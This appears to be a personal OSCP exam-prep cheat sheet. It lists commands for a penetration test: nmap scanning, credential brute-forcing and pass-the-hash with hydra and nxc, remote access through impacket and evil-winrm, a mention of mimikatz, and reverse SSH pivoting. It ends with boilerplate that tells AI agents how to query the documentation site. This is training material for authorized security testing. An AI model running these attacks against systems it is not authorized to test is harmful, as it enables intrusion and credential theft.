# Guideline
## Scanning shit
### nmap
To Run
sudo nmap <IP>/<subnet mask> -o network.nmap
sudo nmap -sV -sC -sT -T4 -A --top-ports=100 --open <IP> -Pn -o target.commonmap
sudo nmap -sV -sC -sT -T4 -A -p- --open <IP> -Pn -o target.fullmap
In case of slow scans
sudo nmap -p- --open <IP> -Pn -o target.fullmap
sudo nmap -sV -sC -sT -T4 -A -p<> --open <IP> -Pn -o target.<port>map
When not sure about service vulnerability (Look for EDB-ID tags)
sudo nmap -sV -p<> --script "vuln" <IP> -o target.vulnmap
Refer to [Service Enumeration](/oscp-exam-prep/commons/service-enumeration.md), for respective services
### Checking Remote access viability (Require Credentials)
#### SSH
{% code overflow="wrap" fullWidth="true" %}
```
hydra -l -P -s ssh://
hydra -L -P -s ssh://
To access:
ssh @
ssh -i @ -o "IdentitiesOnly=yes"
```
{% endcode %}
#### SMB
{% code overflow="wrap" fullWidth="true" %}
```
nxc smb -d -u users.txt -p passwords.txt --continue-on-success
nxc smb -d -u users.txt -H hashes.txt --continue-on-success
To access:
impacket-smbexec [domain\\][:password]@
impacket-psexec [domain\\][:password]@
impacket-wmiexec [domain\\][:password]@
```
{% endcode %}
#### WINRM
{% code overflow="wrap" fullWidth="true" %}
```
nxc winrm -d -u users.txt -p passwords.txt --continue-on-success
nxc winrm -d -u users.txt -H hashes.txt --continue-on-success
To access:
evil-winrm -i -u [domain\\] -p
# You can download files with the download keyword
```
{% endcode %}
#### RDP
{% code overflow="wrap" fullWidth="true" %}
```
nxc rdp -d -u users.txt -p passwords.txt --continue-on-success
nxc rdp -d -u users.txt -H hashes.txt --continue-on-success
To access:
xfreerdp /d: /u: /p: /v: /kbd:0x0000040a +clipboard /cert:ignore /size:70% +drive:/kali/directory,KALISHARE
```
{% endcode %}
* Check Service version
* Check CMS Version
* Check LFI vulnerabilities
* Check SQLi injections
#### Kerbrute (Checking valid usernames with DC)
{% code overflow="wrap" fullWidth="true" %}
```
wget https://github.com/ropnop/kerbrute && chmod +x kerbrute
./kerbrute userenum users.txt --dc --domain
```
{% endcode %}
## Enumeration on inside
#### Linux
* Run linPEAS.sh
* Refer for manual enumeration: [Linux](/oscp-exam-prep/enumeration/linux.md)
#### Windows
* Run winPEASx64.exe or winPEASx32.exe
* Run mimikatz.exe
* Refer for manual enumeration: [Windows](/oscp-exam-prep/enumeration/windows.md)
## Pivoting
* Reverse SSH connection
{% code overflow="wrap" fullWidth="true" %}
```
On Kali Machine:
sudo systemctl start ssh
sudo nano /etc/proxychains.conf
> Append: socks5 127.0.0.1
On target Pivot Machine:
ssh -N -R kali@
To verify on Kali Machine:
ss -ntplu
To use:
proxychains
```
{% endcode %}
* Refer to [Port Forwarding](/oscp-exam-prep/commons/port-forwarding.md) and [Port Forwarding Extras](/oscp-exam-prep/port-forwarding-extras/linux.md)for other methods
* Consider using Chisel for a Linux pivot
* Consider using Chisel, or Plink.exe for Windows pivot
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://personal-archive.gitbook.io/oscp-exam-prep/guideline.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.